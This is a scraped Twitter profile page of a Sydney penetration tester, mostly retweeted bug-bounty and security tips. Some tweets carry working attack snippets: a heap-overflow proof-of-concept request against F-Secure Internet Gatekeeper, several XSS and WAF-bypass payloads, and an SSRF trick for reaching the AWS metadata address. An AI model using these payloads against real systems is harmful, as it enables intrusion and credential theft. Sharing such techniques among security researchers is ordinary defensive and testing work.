Abartan Dhakal (MAD)   

@imhaxormad

21 | Penetration Tester | leader | Infosec writer| Musician| Poet| Personal Tweets| ambassador | I run NepSec Sydney Meetup

Sydney, New South Wales
abartandhakal.com.np
Prikaz prijenosa uživo Prijenos UŽIVO
Vrijeme pridruživanja: srpanj 2013.
186 fotografija ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @imhaxormad

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @imhaxormad

  1. Prikvačeni tweet
    20. pro 2018.

    Goals for 2019, 1) organise meetups as I promised when I became ambassador for 2) Try my best to join the triage team to work alongside and in 3) Learn more into Pentest and try harder for OSCP 4) join 💪💪 5) Learn more.

    60 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet
    4. velj

    [PoC] Heap Overflow in F-Secure Internet Gatekeeper POST /submit HTTP/1.1 Host: 192.168.0.24:9012 Content-Length: 21487483844 AAAAAAAAAAAAAAAAAAAAAAAAAAA

    63 proslijeđena tweeta 150 korisnika označava da im se sviđa
    Poništi
  3. proslijedio/la je Tweet
    4. velj

    ==API TIPS== To welcome the new year, we published a daily tip on API Security & API Pentesting during the month of January 2020. Check out my new article and explore 31 tips + interesting insights about them.

    133 proslijeđena tweeta 319 korisnika označava da im se sviđa
    Poništi
  4. proslijedio/la je Tweet
    3. velj

    Hey bug hunters! Want a look at some of the top vulnerabilities ever found on ? They just released the last blog post I wrote before leaving. Enjoy!

    200 proslijeđenih tweetova 601 korisnik označava da mu se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    3. velj

    XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()//

    161 proslijeđeni tweet 457 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    3. velj

    Just discovered a new 0-day RCE in a well known network monitoring software, the code is well written which took me sometime to find the vulnerability. you can exploit it without authentication under some conditions. stay tuned for the full exploit code and a detailed article!

    7 replies 68 proslijeđenih tweetova 301 korisnik označava da mu se sviđa
    Poništi
  7. proslijedio/la je Tweet
    4. velj

    I published this trick in 2015

    When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018)
    Prikaži ovu nit
    7 replies 77 proslijeđenih tweetova 285 korisnika označava da im se sviđa
    Poništi
  8. proslijedio/la je Tweet
    2. velj

    In collaboration with , we are very pleased to present the worlds first writers challenge coin, the Secjuice Triple Ten. Open to any writer, journalist, researcher or professional focused on information security.

    17 proslijeđenih tweetova 29 korisnika označava da im se sviđa
    Poništi
  9. proslijedio/la je Tweet
    3. velj

    I constantly get asked on how to enter the and industry. In hopes of helping more people I wrote an article about it. Medium: LinkedIn:

    32 proslijeđena tweeta 56 korisnika označava da im se sviđa
    Poništi
  10. 3. velj

    ✔️

    1 korisnik označava da mu se sviđa
    Poništi
  11. proslijedio/la je Tweet
    2. velj

    Third episode of HackStart AMA with Coming soon on your screens.

    1 reply 2 proslijeđena tweeta 4 korisnika označavaju da im se sviđa
    Poništi
  12. 1. velj

    I wish I could go home and not think of anything at all! 😒 Boring weekends fully out of human interaction 😪

    1 proslijeđeni tweet 17 korisnika označava da im se sviđa
    Poništi
  13. proslijedio/la je Tweet
    31. sij

    Akamai WAF Bypass, worked on a recent program <x onauxclick=a=alert,a(domain)>click

    106 proslijeđenih tweetova 297 korisnika označava da im se sviđa
    Poništi
  14. proslijedio/la je Tweet
    31. sij

    The Complete Guide to CORS (In) Security by . Do give it a read because it's very well written. 😋

    1 reply 18 proslijeđenih tweetova 26 korisnika označava da im se sviđa
    Poništi
  15. proslijedio/la je Tweet
    31. sij

    If an application uses markdown, make sure to test it for xss. I used [Click here](javascript:alert(1)), to create a link via markdown and when the user clicks on Click here, the xss will get executed. Read this article.

    1 reply 41 proslijeđeni tweet 117 korisnika označava da im se sviđa
    Poništi
  16. 31. sij

    When next are we catching up? 🤪🤪

    Hallo! Over the last year or so, the amount of questions/DMs I receive each day has increased dramatically, and I'm struggling to keep up. I also have a full-time job, a time-intensive side hustle (bounties), a family, a dog, etc. 1/5
    Prikaži ovu nit
    6 korisnika označava da im se sviđa
    Poništi
  17. proslijedio/la je Tweet
    30. sij

    I published another blog today. This is a story about an interesting SQL Injection I found. “A Not-So-Blind RCE with SQL Injection” by Prashant Kumar

    136 proslijeđenih tweetova 294 korisnika označavaju da im se sviđa
    Poništi
  18. proslijedio/la je Tweet
    31. sij

    The most transparent article on Heap Exploitation by There are few articles too but this is the best one to understand heap in layman's term.

    1 reply 9 proslijeđenih tweetova 19 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    30. sij

    5 things companies should avoid in bug bounty management

    24 proslijeđena tweeta 79 korisnika označava da im se sviđa
    Poništi
  20. proslijedio/la je Tweet
    29. sij

    How to Red Team #1 - A twitter red team mind map Need credentials from the outside? 1. OSINT (Find e-mail/PII) 2. Social Engineer (Trick someone into clicking an e-mail you sent them w/o a payload) 3. Target External Services (Password Spray or find a vulnerable service )

    10 replies 171 proslijeđeni tweet 544 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  21. proslijedio/la je Tweet
    30. sij

    Some hunters made over €50.000 in bug bounties with this simple trick. 🤑 Thanks for the , !

    12 replies 432 proslijeđena tweeta 1.210 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi

@imhaxormad još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·